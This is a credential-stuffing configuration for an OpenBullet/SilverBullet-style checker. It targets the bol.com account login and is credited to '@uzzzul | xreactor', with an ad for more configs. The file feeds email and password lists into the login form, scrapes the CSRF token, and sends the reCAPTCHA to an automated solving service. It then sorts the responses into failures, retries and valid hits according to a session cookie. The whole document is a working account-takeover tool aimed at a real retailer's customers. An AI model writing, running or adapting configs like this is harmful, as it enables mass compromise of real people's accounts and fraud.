[SETTINGS]
{
  "Name": "bol.com | xreactor.org",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-01-26T20:59:18.7790121+02:00",
  "AdditionalInfo": "for more configs: xreactor.org",
  "RequiredPlugins": [],
  "Author": "@uzzzul | @xreactor_team",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "bol",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://www.bol.com/nl/account/login.html" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#csrf PARSE "<SOURCE>" LR "<input name=\"_csrf\" type=\"hidden\" value=\"" "\"" -> VAR "csrf" 

#CAPTCHA SOLVECAPTCHA ReCaptchaV2 "6LfvbwkTAAAAANOIO8BXcuW1TzqOPfdZ3aUPhuPY" "https://www.bol.com/nl/account/login.html" 

REQUEST POST "https://www.bol.com/nl/account/login.html?bltgh=mk8YM3P-rhY07dDyY3RA1w.2.3.Login" 
  CONTENT "emailr=<USER>&passwd=<PASS>&g-recaptcha-response=<SOLUTION>&security_token_v1=4067135610932793&submit=submit&_csrf=<csrf>&redirectUrl=%2Fnl%2Frnwy%2Faccount%2Foverzicht&alertProductId=false" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: www.bol.com" 
  HEADER "Origin: https://www.bol.com" 
  HEADER "Referer: https://www.bol.com/nl/account/login.html?redirectUrl=/nl/rnwy/account/overzicht" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Mobile Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "De combinatie van e-mailadres en wachtwoord is niet geldig." 
  KEYCHAIN Retry OR 
    KEY "Geef hieronder aan dat je geen robot bent." 
  KEYCHAIN Success OR 
    KEY "<COOKIES{*}>" Contains "chatrToken" 

#author FUNCTION Constant "@uzzzul | @xreactor.org" -> CAP "configby" 

